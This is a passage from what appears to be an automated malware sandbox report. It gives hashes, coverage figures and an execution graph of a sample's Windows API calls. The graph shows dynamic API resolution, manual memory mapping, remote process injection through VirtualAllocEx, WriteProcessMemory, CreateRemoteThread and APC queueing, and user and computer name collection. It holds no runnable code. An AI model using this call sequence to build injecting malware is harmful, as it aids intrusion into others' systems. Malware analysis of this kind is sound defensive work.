                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ce1118a3d68641cf7bcb52c8cfbeb9de588c640064439e36528d49136769137
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88F0653171150C82FBF69B6658457F622929B4DBD0F58D830FE0546791EE2D878E8700

                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                            Execution Coverage:6.6%
                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                            Signature Coverage:9.8%
                                                                                                                                                                                                                            Total number of Nodes:1524
                                                                                                                                                                                                                            Total number of Limit Nodes:77
                                                                                                                                                                                                                            execution_graph 20783 29f3b904a50 20786 29f3b904550 20783->20786 20787 29f3b90457c 20786->20787 20788 29f3b904a0b 20787->20788 20844 29f3b8f2c40 20787->20844 20793 29f3b905560 RtlFreeHeap 20794 29f3b90461b 20793->20794 20795 29f3b905560 RtlFreeHeap 20794->20795 20797 29f3b90462f 20794->20797 20796 29f3b90464e 20795->20796 20799 29f3b8fbe20 RtlFreeHeap 20796->20799 20798 29f3b9048bd 20797->20798 20800 29f3b914be0 NtProtectVirtualMemory 20797->20800 20802 29f3b8ea230 LdrGetProcedureAddress 20798->20802 20803 29f3b9048db 20798->20803 20805 29f3b904662 20799->20805 20801 29f3b90488f 20800->20801 20804 29f3b913a40 NtProtectVirtualMemory 20801->20804 20802->20803 20806 29f3b904950 20803->20806 20807 29f3b913ba0 RtlFreeHeap 20803->20807 20804->20798 20805->20797 20810 29f3b913de0 RtlFreeHeap 20805->20810 20809 29f3b90b4e0 RtlFreeHeap 20806->20809 20808 29f3b904933 20807->20808 20815 29f3b8f9830 RtlFreeHeap 20808->20815 20811 29f3b904970 20809->20811 20812 29f3b9046cf 20810->20812 20813 29f3b90b4e0 RtlFreeHeap 20811->20813 20814 29f3b8ea050 RtlFreeHeap 20812->20814 20816 29f3b90497a 20813->20816 20817 29f3b9046e3 20814->20817 20815->20806 20818 29f3b90b4e0 RtlFreeHeap 20816->20818 20819 29f3b904726 20817->20819 20821 29f3b913ba0 RtlFreeHeap 20817->20821 20820 29f3b904984 20818->20820 20870 29f3b8ec7a0 20819->20870 20822 29f3b90b4e0 RtlFreeHeap 20820->20822 20823 29f3b90470d 20821->20823 20825 29f3b90498c 20822->20825 20826 29f3b8ea050 RtlFreeHeap 20823->20826 20828 29f3b90b4e0 RtlFreeHeap 20825->20828 20826->20819 20827 29f3b90474d 20827->20797 20884 29f3b8ea230 20827->20884 20829 29f3b904999 20828->20829 20830 29f3b90b4e0 RtlFreeHeap 20829->20830 20832 29f3b9049a6 20830->20832 20834 29f3b90b4e0 RtlFreeHeap 20832->20834 20833 29f3b90477e 20833->20797 20835 29f3b8e4cd0 2 API calls 20833->20835 20836 29f3b9049c2 20834->20836 20837 29f3b904797 20835->20837 20838 29f3b90b4e0 RtlFreeHeap 20836->20838 20837->20797 20840 29f3b8e4cd0 2 API calls 20837->20840 20839 29f3b9049ce 20838->20839 20839->20788 20841 29f3b914740 NtFreeVirtualMemory 20839->20841 20843 29f3b9047c4 20840->20843 20841->20788 20842 29f3b8ea230 LdrGetProcedureAddress 20842->20797 20843->20797 20843->20842 20845 29f3b8f2c57 20844->20845 20846 29f3b8f2c61 20845->20846 20847 29f3b8ecce0 LdrGetProcedureAddress 20845->20847 20850 29f3b8f12c0 20846->20850 20848 29f3b8f2ccf 20847->20848 20849 29f3b8ecce0 LdrGetProcedureAddress 20848->20849 20849->20846 20851 29f3b8f12f6 20850->20851 20852 29f3b8ecce0 LdrGetProcedureAddress 20851->20852 20869 29f3b8f141e 20851->20869 20853 29f3b8f1320 20852->20853 20854 29f3b8ecce0 LdrGetProcedureAddress 20853->20854 20855 29f3b8f133b 20854->20855 20856 29f3b8ecce0 LdrGetProcedureAddress 20855->20856 20857 29f3b8f1364 20856->20857 20858 29f3b8ecce0 LdrGetProcedureAddress 20857->20858 20859 29f3b8f1383 20858->20859 20860 29f3b8ecce0 LdrGetProcedureAddress 20859->20860 20861 29f3b8f13a2 20860->20861 20862 29f3b8ecce0 LdrGetProcedureAddress 20861->20862 20863 29f3b8f13c1 20862->20863 20864 29f3b8ecce0 LdrGetProcedureAddress 20863->20864 20865 29f3b8f13e0 20864->20865 20866 29f3b8ecce0 LdrGetProcedureAddress 20865->20866 20867 29f3b8f13ff 20866->20867 20868 29f3b8ecce0 LdrGetProcedureAddress 20867->20868 20868->20869 20869->20793 20871 29f3b8ec7e6 20870->20871 20872 29f3b8ec844 20870->20872 20889 29f3b8f8fb0 20871->20889 20893 29f3b913f40 20872->20893 20876 29f3b8ec7f3 20897 29f3b90ea70 20876->20897 20878 29f3b90b4e0 RtlFreeHeap 20880 29f3b8ec809 20878->20880 20879 29f3b8ec932 20879->20827 20880->20876 20882 29f3b8ec9de 20880->20882 20883 29f3b8ecce0 LdrGetProcedureAddress 20880->20883 20881 29f3b914be0 NtProtectVirtualMemory 20881->20882 20882->20879 20882->20881 20883->20880 20885 29f3b8f12c0 LdrGetProcedureAddress 20884->20885 20886 29f3b8ea245 20885->20886 20905 29f3b8f2d20 20886->20905 20888 29f3b8ea24a 20888->20833 20891 29f3b8f8fc4 20889->20891 20890 29f3b8ec7ee 20890->20876 20890->20878 20891->20890 20892 29f3b914be0 NtProtectVirtualMemory 20891->20892 20892->20890 20895 29f3b913f69 20893->20895 20894 29f3b913fc9 20894->20880 20895->20894 20896 29f3b913fc7 NtAllocateVirtualMemory 20895->20896 20896->20894 20898 29f3b90eaa6 20897->20898 20899 29f3b90b4e0 RtlFreeHeap 20898->20899 20900 29f3b90eaab 20898->20900 20899->20900 20901 29f3b8f9830 RtlFreeHeap 20900->20901 20902 29f3b90eadf 20901->20902 20903 29f3b90b4e0 RtlFreeHeap 20902->20903 20904 29f3b90eae7 20903->20904 20904->20879 20907 29f3b8f2d39 20905->20907 20906 29f3b8f2d43 20906->20888 20907->20906 20908 29f3b8ecce0 LdrGetProcedureAddress 20907->20908 20909 29f3b8f2db2 20908->20909 20910 29f3b8ecce0 LdrGetProcedureAddress 20909->20910 20911 29f3b8f2dcd 20910->20911 20912 29f3b8ecce0 LdrGetProcedureAddress 20911->20912 20913 29f3b8f2df6 20912->20913 20914 29f3b8ecce0 LdrGetProcedureAddress 20913->20914 20915 29f3b8f2e15 20914->20915 20916 29f3b8ecce0 LdrGetProcedureAddress 20915->20916 20917 29f3b8f2e34 20916->20917 20918 29f3b8ecce0 LdrGetProcedureAddress 20917->20918 20919 29f3b8f2e53 20918->20919 20920 29f3b8ecce0 LdrGetProcedureAddress 20919->20920 20921 29f3b8f2e72 20920->20921 20922 29f3b8ecce0 LdrGetProcedureAddress 20921->20922 20923 29f3b8f2e91 20922->20923 20924 29f3b8ecce0 LdrGetProcedureAddress 20923->20924 20925 29f3b8f2eb0 20924->20925 20926 29f3b8ecce0 LdrGetProcedureAddress 20925->20926 20927 29f3b8f2ecf 20926->20927 20928 29f3b8ecce0 LdrGetProcedureAddress 20927->20928 20929 29f3b8f2eee 20928->20929 20930 29f3b8ecce0 LdrGetProcedureAddress 20929->20930 20931 29f3b8f2f0d 20930->20931 20932 29f3b8ecce0 LdrGetProcedureAddress 20931->20932 20933 29f3b8f2f2c 20932->20933 20934 29f3b8ecce0 LdrGetProcedureAddress 20933->20934 20935 29f3b8f2f4b 20934->20935 20936 29f3b8ecce0 LdrGetProcedureAddress 20935->20936 20937 29f3b8f2f6a 20936->20937 20938 29f3b8ecce0 LdrGetProcedureAddress 20937->20938 20939 29f3b8f2f89 20938->20939 20940 29f3b8ecce0 LdrGetProcedureAddress 20939->20940 20941 29f3b8f2fa8 20940->20941 20942 29f3b8ecce0 LdrGetProcedureAddress 20941->20942 20943 29f3b8f2fc7 20942->20943 20944 29f3b8ecce0 LdrGetProcedureAddress 20943->20944 20945 29f3b8f2fe6 20944->20945 20946 29f3b8ecce0 LdrGetProcedureAddress 20945->20946 20947 29f3b8f3005 20946->20947 20948 29f3b8ecce0 LdrGetProcedureAddress 20947->20948 20949 29f3b8f3024 20948->20949 20950 29f3b8ecce0 LdrGetProcedureAddress 20949->20950 20951 29f3b8f3043 20950->20951 20952 29f3b8ecce0 LdrGetProcedureAddress 20951->20952 20953 29f3b8f3062 20952->20953 20954 29f3b8ecce0 LdrGetProcedureAddress 20953->20954 20955 29f3b8f3081 20954->20955 20956 29f3b8ecce0 LdrGetProcedureAddress 20955->20956 20957 29f3b8f30a0 20956->20957 20958 29f3b8ecce0 LdrGetProcedureAddress 20957->20958 20959 29f3b8f30bf 20958->20959 20960 29f3b8ecce0 LdrGetProcedureAddress 20959->20960 20961 29f3b8f30de 20960->20961 20962 29f3b8ecce0 LdrGetProcedureAddress 20961->20962 20963 29f3b8f30fd 20962->20963 20964 29f3b8ecce0 LdrGetProcedureAddress 20963->20964 20965 29f3b8f311c 20964->20965 20966 29f3b8ecce0 LdrGetProcedureAddress 20965->20966 20966->20906 19493 29f3b751200 19494 29f3b75121f 19493->19494 19495 29f3b751215 19493->19495 19498 29f3b75122d 19494->19498 19501 29f3b7511c0 VirtualAlloc 19494->19501 19502 29f3b751070 19495->19502 19499 29f3b75123d 19499->19498 19505 29f3b751190 19499->19505 19501->19499 19503 29f3b751085 VirtualQuery 19502->19503 19504 29f3b751081 19502->19504 19503->19504 19504->19494 19506 29f3b7511b4 19505->19506 19507 29f3b7511a1 VirtualFree 19505->19507 19506->19498 19507->19506 19508 29f3b751000 19514 29f3b752650 19508->19514 19529 29f3b752050 19514->19529 19517 29f3b7526b0 19518 29f3b752714 19517->19518 19519 29f3b752702 SetLastError 19517->19519 19520 29f3b752741 SetLastError 19518->19520 19521 29f3b752753 19518->19521 19527 29f3b751055 ExitProcess 19519->19527 19520->19527 19522 29f3b75276c 19521->19522 19528 29f3b7527bb 19521->19528 19523 29f3b752787 SetLastError 19522->19523 19524 29f3b752799 19522->19524 19523->19527 19526 29f3b752893 SetLastError 19524->19526 19524->19527 19525 29f3b752876 SetLastError 19525->19527 19526->19527 19528->19524 19528->19525 19564 29f3b751340 19529->19564 19532 29f3b75103a 19532->19517 19533 29f3b7520bf SetLastError 19533->19532 19534 29f3b7520d1 19535 29f3b751340 SetLastError 19534->19535 19536 29f3b7520f8 19535->19536 19536->19532 19537 29f3b75212c SetLastError 19536->19537 19538 29f3b75213e 19536->19538 19537->19532 19539 29f3b752160 19538->19539 19540 29f3b75214e SetLastError 19538->19540 19541 29f3b75216f SetLastError 19539->19541 19543 29f3b752181 GetNativeSystemInfo 19539->19543 19540->19532 19541->19532 19544 29f3b752288 SetLastError 19543->19544 19545 29f3b75229a VirtualAlloc 19543->19545 19544->19532 19546 29f3b7522ff GetProcessHeap HeapAlloc 19545->19546 19547 29f3b7522c7 VirtualAlloc 19545->19547 19548 29f3b752326 VirtualFree SetLastError 19546->19548 19549 29f3b75234b 19546->19549 19547->19546 19550 29f3b7522ed SetLastError 19547->19550 19548->19532 19551 29f3b751340 SetLastError 19549->19551 19550->19532 19552 29f3b7523fc 19551->19552 19553 29f3b75240a VirtualAlloc 19552->19553 19563 29f3b752400 19552->19563 19554 29f3b752450 19553->19554 19567 29f3b751380 19554->19567 19557 29f3b7524ac 19557->19563 19575 29f3b751c80 19557->19575 19561 29f3b752547 19562 29f3b7525da SetLastError 19561->19562 19561->19563 19562->19563 19563->19532 19595 29f3b7528e0 19563->19595 19565 29f3b75135f SetLastError 19564->19565 19566 29f3b75136e 19564->19566 19565->19566 19566->19532 19566->19533 19566->19534 19570 29f3b7513ce 19567->19570 19568 29f3b75149c 19571 29f3b751340 SetLastError 19568->19571 19569 29f3b75141e VirtualAlloc 19569->19570 19574 29f3b751458 19569->19574 19570->19568 19570->19569 19570->19574 19572 29f3b7514c0 19571->19572 19573 29f3b7514cb VirtualAlloc 19572->19573 19572->19574 19573->19574 19574->19557 19576 29f3b751cdd IsBadReadPtr 19575->19576 19585 29f3b751cd3 19575->19585 19578 29f3b751d1c 19576->19578 19576->19585 19579 29f3b751d65 SetLastError 19578->19579 19580 29f3b751d7d 19578->19580 19578->19585 19579->19585 19602 29f3b751200 19580->19602 19583 29f3b751db0 SetLastError 19583->19585 19585->19563 19588 29f3b751790 19585->19588 19586 29f3b751f9c SetLastError 19586->19585 19587 29f3b751de4 19587->19585 19587->19586 19589 29f3b751830 19588->19589 19591 29f3b751904 19589->19591 19593 29f3b751987 19589->19593 19611 29f3b7515e0 19589->19611 19590 29f3b7515e0 2 API calls 19594 29f3b75198b 19590->19594 19591->19561 19593->19590 19593->19594 19594->19561 19596 29f3b752900 19595->19596 19600 29f3b752905 19595->19600 19596->19532 19597 29f3b7529b1 19598 29f3b7529d4 GetProcessHeap HeapFree 19597->19598 19599 29f3b7529bd VirtualFree 19597->19599 19598->19596 19599->19598 19600->19597 19601 29f3b751190 VirtualFree 19600->19601 19601->19597 19603 29f3b75121f 19602->19603 19604 29f3b751215 19602->19604 19607 29f3b75122d 19603->19607 19610 29f3b7511c0 VirtualAlloc 19603->19610 19605 29f3b751070 VirtualQuery 19604->19605 19605->19603 19607->19583 19607->19587 19608 29f3b75123d 19608->19607 19609 29f3b751190 VirtualFree 19608->19609 19609->19607 19610->19608 19612 29f3b751608 19611->19612 19617 29f3b7515fe 19611->19617 19614 29f3b751619 19612->19614 19615 29f3b75168c VirtualProtect 19612->19615 19613 29f3b751664 VirtualFree 19613->19617 19614->19613 19614->19617 19615->19617 19617->19593 19324 273f41380 Sleep VirtualAllocEx 19325 273f413d2 WriteProcessMemory 19324->19325 19327 273f4144e 19324->19327 19326 273f41402 CreateRemoteThread 19325->19326 19325->19327 19326->19327 19328 273f4143c 19326->19328 19328->19327 19329 273f41440 WaitForSingleObject 19328->19329 19329->19327 19618 29f3b7515e0 19619 29f3b751608 19618->19619 19624 29f3b7515fe 19618->19624 19621 29f3b751619 19619->19621 19622 29f3b75168c VirtualProtect 19619->19622 19620 29f3b751664 VirtualFree 19620->19624 19621->19620 19621->19624 19622->19624 22580 273f41540 22581 273f4154f 22580->22581 22584 273f41380 Sleep VirtualAllocEx 22581->22584 22585 273f413d2 WriteProcessMemory 22584->22585 22587 273f4144e 22584->22587 22586 273f41402 CreateRemoteThread 22585->22586 22585->22587 22586->22587 22588 273f4143c 22586->22588 22588->22587 22589 273f41440 WaitForSingleObject 22588->22589 22589->22587 19330 29f3b8f55c0 19337 29f3b8f5609 19330->19337 19336 29f3b8f5eed 19400 29f3b8f8620 19336->19400 19337->19336 19370 29f3b914360 19337->19370 19338 29f3b8f57d1 19338->19336 19378 29f3b8ff3a0 19338->19378 19343 29f3b914ff0 NtQueueApcThread 19344 29f3b8f5eb0 19343->19344 19344->19336 19345 29f3b8f5ec5 19344->19345 19346 29f3b914ff0 NtQueueApcThread 19344->19346 19345->19336 19347 29f3b914ff0 NtQueueApcThread 19345->19347 19349 29f3b8f5f0e 19346->19349 19348 29f3b8f5ee9 19347->19348 19348->19336 19351 29f3b914ff0 NtQueueApcThread 19348->19351 19349->19336 19350 29f3b914ff0 NtQueueApcThread 19349->19350 19350->19345 19352 29f3b8f5f67 19351->19352 19352->19336 19353 29f3b914ff0 NtQueueApcThread 19352->19353 19354 29f3b8f5f93 19353->19354 19354->19336 19355 29f3b914ff0 NtQueueApcThread 19354->19355 19356 29f3b8f5fbf 19355->19356 19356->19336 19357 29f3b8f5fd4 19356->19357 19359 29f3b914ff0 NtQueueApcThread 19356->19359 19357->19336 19358 29f3b914ff0 NtQueueApcThread 19357->19358 19360 29f3b8f5ff8 19358->19360 19359->19357 19360->19336 19361 29f3b8f6033 19360->19361 19362 29f3b914ff0 NtQueueApcThread 19360->19362 19361->19336 19363 29f3b914ff0 NtQueueApcThread 19361->19363 19362->19361 19364 29f3b8f6057 19363->19364 19364->19336 19365 29f3b914ff0 NtQueueApcThread 19364->19365 19366 29f3b8f60a9 19365->19366 19366->19336 19367 29f3b914ff0 NtQueueApcThread 19366->19367 19368 29f3b8f60d5 19367->19368 19368->19336 19395 29f3b913a40 19368->19395 19372 29f3b9143bd 19370->19372 19371 29f3b8f5795 19371->19336 19374 29f3b9145f0 19371->19374 19372->19371 19373 29f3b91444e NtCreateThreadEx 19372->19373 19373->19371 19376 29f3b914621 19374->19376 19375 29f3b914686 19375->19338 19376->19375 19377 29f3b914684 NtDuplicateObject 19376->19377 19377->19375 19379 29f3b8ff3bd 19378->19379 19380 29f3b8ff3f2 CreateToolhelp32Snapshot 19379->19380 19381 29f3b8ff610 19380->19381 19382 29f3b8ff418 Thread32First 19380->19382 19448 29f3b90b4e0 19381->19448 19382->19381 19389 29f3b8ff439 19382->19389 19384 29f3b8ff5fc Thread32Next 19384->19381 19384->19389 19385 29f3b8ff61c 19386 29f3b8f5871 19385->19386 19387 29f3b90b4e0 RtlFreeHeap 19385->19387 19386->19336 19391 29f3b914ff0 19386->19391 19387->19386 19389->19384 19390 29f3b8ff5fa NtResumeThread 19389->19390 19444 29f3b9151c0 19389->19444 19390->19384 19392 29f3b915011 19391->19392 19393 29f3b8f5e84 19392->19393 19394 29f3b91506a NtQueueApcThread 19392->19394 19393->19336 19393->19343 19394->19393 19452 29f3b914be0 19395->19452 19397 29f3b913b56 19397->19336 19398 29f3b913a97 19398->19397 19399 29f3b914be0 NtProtectVirtualMemory 19398->19399 19399->19398 19401 29f3b8f863e 19400->19401 19402 29f3b8f8632 19400->19402 19404 29f3b8f8654 19401->19404 19405 29f3b90b4e0 RtlFreeHeap 19401->19405 19403 29f3b90b4e0 RtlFreeHeap 19402->19403 19403->19401 19406 29f3b8f866a 19404->19406 19408 29f3b90b4e0 RtlFreeHeap 19404->19408 19405->19404 19407 29f3b8f8680 19406->19407 19409 29f3b90b4e0 RtlFreeHeap 19406->19409 19410 29f3b8f8696 19407->19410 19411 29f3b90b4e0 RtlFreeHeap 19407->19411 19408->19406 19409->19407 19412 29f3b8f86ac 19410->19412 19413 29f3b90b4e0 RtlFreeHeap 19410->19413 19411->19410 19414 29f3b8f86c2 19412->19414 19415 29f3b90b4e0 RtlFreeHeap 19412->19415 19413->19412 19416 29f3b8f86d8 19414->19416 19417 29f3b90b4e0 RtlFreeHeap 19414->19417 19415->19414 19418 29f3b8f86ee 19416->19418 19419 29f3b90b4e0 RtlFreeHeap 19416->19419 19417->19416 19420 29f3b8f8704 19418->19420 19421 29f3b90b4e0 RtlFreeHeap 19418->19421 19419->19418 19422 29f3b8f871a 19420->19422 19423 29f3b90b4e0 RtlFreeHeap 19420->19423 19421->19420 19424 29f3b8f8730 19422->19424 19425 29f3b90b4e0 RtlFreeHeap 19422->19425 19423->19422 19426 29f3b8f8746 19424->19426 19427 29f3b90b4e0 RtlFreeHeap 19424->19427 19425->19424 19428 29f3b8f875c 19426->19428 19430 29f3b90b4e0 RtlFreeHeap 19426->19430 19427->19426 19429 29f3b8f8772 19428->19429 19431 29f3b90b4e0 RtlFreeHeap 19428->19431 19432 29f3b8f8782 19429->19432 19433 29f3b90b4e0 RtlFreeHeap 19429->19433 19430->19428 19431->19429 19434 29f3b8f87a6 19432->19434 19435 29f3b90b4e0 RtlFreeHeap 19432->19435 19433->19432 19436 29f3b8f87bc 19434->19436 19438 29f3b90b4e0 RtlFreeHeap 19434->19438 19435->19434 19437 29f3b8f87d2 19436->19437 19439 29f3b90b4e0 RtlFreeHeap 19436->19439 19440 29f3b8f87e8 19437->19440 19441 29f3b90b4e0 RtlFreeHeap 19437->19441 19438->19436 19439->19437 19442 29f3b8f6177 19440->19442 19443 29f3b90b4e0 RtlFreeHeap 19440->19443 19441->19440 19443->19442 19446 29f3b9151e2 19444->19446 19445 29f3b91523e 19445->19389 19446->19445 19447 29f3b91523c NtReadVirtualMemory 19446->19447 19447->19445 19449 29f3b90b523 19448->19449 19450 29f3b90b4f0 19448->19450 19449->19385 19450->19449 19451 29f3b90b511 RtlFreeHeap 19450->19451 19451->19449 19454 29f3b914c02 19452->19454 19453 29f3b914c5e 19453->19398 19454->19453 19455 29f3b914c5c NtProtectVirtualMemory 19454->19455 19455->19453 19485 29f3b914be0 19487 29f3b914c02 19485->19487 19486 29f3b914c5e 19487->19486 19488 29f3b914c5c NtProtectVirtualMemory 19487->19488 19488->19486 19627 29f3b8e7bf0 19628 29f3b8e7c06 19627->19628 19644 29f3b8e2930 19628->19644 19630 29f3b8e7c24 19783 29f3b8e8ed0 19630->19783 19632 29f3b8e7d64 19816 29f3b8e7f70 19632->19816 19634 29f3b8e7d8c 19957 29f3b904d00 GetUserNameW GetComputerNameExW 19634->19957 19636 29f3b8e7f54 19637 29f3b8e7da4 19637->19636 19989 29f3b914740 19637->19989 19640 29f3b8f4700 RtlFreeHeap 19643 29f3b8e7e3b 19640->19643 19642 29f3b8f8c60 CreateFiber DeleteFiber 19642->19643 19643->19636 19643->19640 19643->19642 19993 29f3b8f3d90 19643->19993 20039 29f3b8e8bc0 19643->20039 20088 29f3b8effe0 19644->20088 19650 29f3b8e2943 19651 29f3b8ef5f5 19650->19651 20160 29f3b8ecce0 19650->20160 19651->19630 19654 29f3b8ecce0 LdrGetProcedureAddress 19655 29f3b8eee2b 19654->19655 19656 29f3b8ecce0 LdrGetProcedureAddress 19655->19656 19657 29f3b8eee54 19656->19657 19658 29f3b8ecce0 LdrGetProcedureAddress 19657->19658 19659 29f3b8eee73 19658->19659 19660 29f3b8ecce0 LdrGetProcedureAddress 19659->19660 19661 29f3b8eee92 19660->19661 19662 29f3b8ecce0 LdrGetProcedureAddress 19661->19662 19663 29f3b8eeeb1 19662->19663 19664 29f3b8ecce0 LdrGetProcedureAddress 19663->19664 19665 29f3b8eeed0 19664->19665 19666 29f3b8ecce0 LdrGetProcedureAddress 19665->19666 19667 29f3b8eeeef 19666->19667 19668 29f3b8ecce0 LdrGetProcedureAddress 19667->19668 19669 29f3b8eef0e 19668->19669 19670 29f3b8ecce0 LdrGetProcedureAddress 19669->19670 19671 29f3b8eef2d 19670->19671 19672 29f3b8ecce0 LdrGetProcedureAddress 19671->19672 19673 29f3b8eef4c 19672->19673 19674 29f3b8ecce0 LdrGetProcedureAddress 19673->19674 19675 29f3b8eef6b 19674->19675 19676 29f3b8ecce0 LdrGetProcedureAddress 19675->19676 19677 29f3b8eef8a 19676->19677 19678 29f3b8ecce0 LdrGetProcedureAddress 19677->19678 19679 29f3b8eefa9 19678->19679 19680 29f3b8ecce0 LdrGetProcedureAddress 19679->19680 19681 29f3b8eefc8 19680->19681 19682 29f3b8ecce0 LdrGetProcedureAddress 19681->19682 19683 29f3b8eefe7 19682->19683 19684 29f3b8ecce0 LdrGetProcedureAddress 19683->19684 19685 29f3b8ef006 19684->19685 19686 29f3b8ecce0 LdrGetProcedureAddress 19685->19686 19687 29f3b8ef025 19686->19687 19688 29f3b8ecce0 LdrGetProcedureAddress 19687->19688 19689 29f3b8ef044 19688->19689 19690 29f3b8ecce0 LdrGetProcedureAddress 19689->19690 19691 29f3b8ef063 19690->19691 19692 29f3b8ecce0 LdrGetProcedureAddress 19691->19692 19693 29f3b8ef082 19692->19693 19694 29f3b8ecce0 LdrGetProcedureAddress 19693->19694 19695 29f3b8ef0a1 19694->19695 19696 29f3b8ecce0 LdrGetProcedureAddress 19695->19696 19697 29f3b8ef0c0 19696->19697 19698 29f3b8ecce0 LdrGetProcedureAddress 19697->19698 19699 29f3b8ef0df 19698->19699 19700 29f3b8ecce0 LdrGetProcedureAddress 19699->19700 19701 29f3b8ef0fe 19700->19701 19702 29f3b8ecce0 LdrGetProcedureAddress 19701->19702 19703 29f3b8ef11d 19702->19703 19704 29f3b8ecce0 LdrGetProcedureAddress 19703->19704 19705 29f3b8ef13c 19704->19705 19706 29f3b8ecce0 LdrGetProcedureAddress 19705->19706 19707 29f3b8ef15b 19706->19707 19708 29f3b8ecce0 LdrGetProcedureAddress 19707->19708 19709 29f3b8ef17a 19708->19709 19710 29f3b8ecce0 LdrGetProcedureAddress 19709->19710 19711 29f3b8ef199 19710->19711 19712 29f3b8ecce0 LdrGetProcedureAddress 19711->19712 19713 29f3b8ef1b8 19712->19713 19714 29f3b8ecce0 LdrGetProcedureAddress 19713->19714 19715 29f3b8ef1d7 19714->19715 19716 29f3b8ecce0 LdrGetProcedureAddress 19715->19716 19717 29f3b8ef1f6 19716->19717 19718 29f3b8ecce0 LdrGetProcedureAddress 19717->19718 19719 29f3b8ef215 19718->19719 19720 29f3b8ecce0 LdrGetProcedureAddress 19719->19720 19721 29f3b8ef234 19720->19721 19722 29f3b8ecce0 LdrGetProcedureAddress 19721->19722 19723 29f3b8ef253 19722->19723 19724 29f3b8ecce0 LdrGetProcedureAddress 19723->19724 19725 29f3b8ef272 19724->19725 19726 29f3b8ecce0 LdrGetProcedureAddress 19725->19726 19727 29f3b8ef291 19726->19727 19728 29f3b8ecce0 LdrGetProcedureAddress 19727->19728 19729 29f3b8ef2b0 19728->19729 19730 29f3b8ecce0 LdrGetProcedureAddress 19729->19730 19731 29f3b8ef2cf 19730->19731 19732 29f3b8ecce0 LdrGetProcedureAddress 19731->19732 19733 29f3b8ef2ee 19732->19733 19734 29f3b8ecce0 LdrGetProcedureAddress 19733->19734 19735 29f3b8ef30d 19734->19735 19736 29f3b8ecce0 LdrGetProcedureAddress 19735->19736 19737 29f3b8ef32c 19736->19737 19738 29f3b8ecce0 LdrGetProcedureAddress 19737->19738 19739 29f3b8ef34b 19738->19739 19740 29f3b8ecce0 LdrGetProcedureAddress 19739->19740 19741 29f3b8ef36a 19740->19741 19742 29f3b8ecce0 LdrGetProcedureAddress 19741->19742 19743 29f3b8ef389 19742->19743 19744 29f3b8ecce0 LdrGetProcedureAddress 19743->19744 19745 29f3b8ef3a8 19744->19745 19746 29f3b8ecce0 LdrGetProcedureAddress 19745->19746 19747 29f3b8ef3c7 19746->19747 19748 29f3b8ecce0 LdrGetProcedureAddress 19747->19748 19749 29f3b8ef3e6 19748->19749 19750 29f3b8ecce0 LdrGetProcedureAddress 19749->19750 19751 29f3b8ef405 19750->19751 19752 29f3b8ecce0 LdrGetProcedureAddress 19751->19752 19753 29f3b8ef424 19752->19753 19754 29f3b8ecce0 LdrGetProcedureAddress 19753->19754 19755 29f3b8ef443 19754->19755 19756 29f3b8ecce0 LdrGetProcedureAddress 19755->19756 19757 29f3b8ef462 19756->19757 19758 29f3b8ecce0 LdrGetProcedureAddress 19757->19758 19759 29f3b8ef481 19758->19759 19760 29f3b8ecce0 LdrGetProcedureAddress 19759->19760 19761 29f3b8ef4a0 19760->19761 19762 29f3b8ecce0 LdrGetProcedureAddress 19761->19762 19763 29f3b8ef4bf 19762->19763 19764 29f3b8ecce0 LdrGetProcedureAddress 19763->19764 19765 29f3b8ef4de 19764->19765 19766 29f3b8ecce0 LdrGetProcedureAddress 19765->19766 19767 29f3b8ef4fd 19766->19767 19768 29f3b8ecce0 LdrGetProcedureAddress 19767->19768 19769 29f3b8ef51c 19768->19769 19770 29f3b8ecce0 LdrGetProcedureAddress 19769->19770 19771 29f3b8ef53b 19770->19771 19772 29f3b8ecce0 LdrGetProcedureAddress 19771->19772 19773 29f3b8ef55a 19772->19773 19774 29f3b8ecce0 LdrGetProcedureAddress 19773->19774 19775 29f3b8ef579 19774->19775 19776 29f3b8ecce0 LdrGetProcedureAddress 19775->19776 19777 29f3b8ef598 19776->19777 19778 29f3b8ecce0 LdrGetProcedureAddress 19777->19778 19779 29f3b8ef5b7 19778->19779 19780 29f3b8ecce0 LdrGetProcedureAddress 19779->19780 19781 29f3b8ef5d6 19780->19781 19782 29f3b8ecce0 LdrGetProcedureAddress 19781->19782 19782->19651 20164 29f3b904ce0 19783->20164 19788 29f3b913de0 RtlFreeHeap 19789 29f3b8e90af 19788->19789 19790 29f3b913de0 RtlFreeHeap 19789->19790 19791 29f3b8e9110 19790->19791 19792 29f3b913de0 RtlFreeHeap 19791->19792 19793 29f3b8e916c 19792->19793 19794 29f3b913de0 RtlFreeHeap 19793->19794 19795 29f3b8e91a1 19794->19795 19796 29f3b913de0 RtlFreeHeap 19795->19796 19797 29f3b8e91f1 19796->19797 19798 29f3b913de0 RtlFreeHeap 19797->19798 19799 29f3b8e9222 19798->19799 19800 29f3b913de0 RtlFreeHeap 19799->19800 19801 29f3b8e925a 19800->19801 19802 29f3b913de0 RtlFreeHeap 19801->19802 19803 29f3b8e92af 19802->19803 19804 29f3b913de0 RtlFreeHeap 19803->19804 19805 29f3b8e92f1 19804->19805 19806 29f3b913de0 RtlFreeHeap 19805->19806 19807 29f3b8e9333 19806->19807 19808 29f3b913de0 RtlFreeHeap 19807->19808 19809 29f3b8e9347 19808->19809 19810 29f3b913de0 RtlFreeHeap 19809->19810 19811 29f3b8e9362 19810->19811 19812 29f3b913de0 RtlFreeHeap 19811->19812 19813 29f3b8e938e 19812->19813 19814 29f3b913de0 RtlFreeHeap 19813->19814 19815 29f3b8e93c1 19814->19815 19815->19632 19817 29f3b8e7f99 19816->19817 19818 29f3b8e7fb8 19816->19818 19819 29f3b913de0 RtlFreeHeap 19817->19819 19820 29f3b8e7fda 19818->19820 19821 29f3b913de0 RtlFreeHeap 19818->19821 19819->19818 20170 29f3b905560 19820->20170 19821->19820 19825 29f3b905560 RtlFreeHeap 19829 29f3b8e8066 19825->19829 19826 29f3b8e802a 19826->19825 19827 29f3b8e8088 19828 29f3b905560 RtlFreeHeap 19827->19828 19833 29f3b8e809c 19828->19833 19829->19827 19831 29f3b90b4e0 RtlFreeHeap 19829->19831 19830 29f3b8e80be 19832 29f3b905560 RtlFreeHeap 19830->19832 19831->19827 19837 29f3b8e80d2 19832->19837 19833->19830 19834 29f3b90b4e0 RtlFreeHeap 19833->19834 19834->19830 19835 29f3b8e80f4 19836 29f3b905560 RtlFreeHeap 19835->19836 19841 29f3b8e8108 19836->19841 19837->19835 19838 29f3b90b4e0 